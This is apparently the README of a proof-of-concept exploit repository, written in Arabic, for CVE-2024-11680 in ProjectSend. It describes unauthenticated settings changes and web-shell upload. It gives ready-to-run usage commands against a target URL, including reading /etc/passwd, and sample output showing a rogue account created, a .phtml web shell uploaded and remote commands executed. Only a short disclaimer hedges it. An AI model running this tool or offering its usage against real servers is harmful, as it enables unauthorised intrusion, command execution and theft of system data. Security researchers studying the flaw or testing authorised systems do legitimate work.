
يحتوي هذا المستودع على استغلال لإثبات المفهوم (PoC) لثغرة CVE-2024-11680، وهي ثغرة حرجة في ProjectSend r1605 والإصدارات الأقدم. يهدف الاستغلال إلى المصادقة غير الصحيحة الناتجة عن مشاكل في إعدادات الامتيازات غير الصحيحة وحقن الأوامر.
هذا هو استغلال إثبات مفهوم لـ CVE-2024-11680، وهي ثغرة تسمح بتعديل الإعدادات دون مصادقة ورفع ويب شيل في ProjectSend.
يستغل هذا الاستغلال عدة ثغرات في ProjectSend:
pip install requests colorama
python3 exploit.py -u <TARGET_URL> -c <COMMAND>
-u, --url: عنوان الهدف (مثل: http://target.com/projectsend)-c, --command: الأمر المراد تنفيذه على الهدف (الافتراضي: id)# Get Python version
python3 exploit.py -u http://target.com/projectsend -c "python3 -V"
# List directory contents
python3 exploit.py -u http://target.com/projectsend -c "ls -la"
# Get system information
python3 exploit.py -u http://target.com/projectsend -c "uname -a"
# Read passwd file
python3 exploit.py -u http://target.com/projectsend -c "cat /etc/passwd"
هذه الأداة مخصصة للأغراض التعليمية فقط. استخدمها بمسؤولية وفقط على الأنظمة التي لديك إذن صريح لاختبارها.
[+] Target is vulnerable
[+] Insecure options enabled
[+] User registered successfully.
[+] New username: NoDLQWYF
[+] New password: X02A3g9LuN4S
[+] File uploaded: kLoISqdA.phtml
[+] File accessible at: http://target.com/projectsend/upload/files/1774958997-3b58e110c289baddfd8a6d1d5f34d96e77009fdc-kLoISqdA.phtml
[+] Command Output:
Python 3.9.2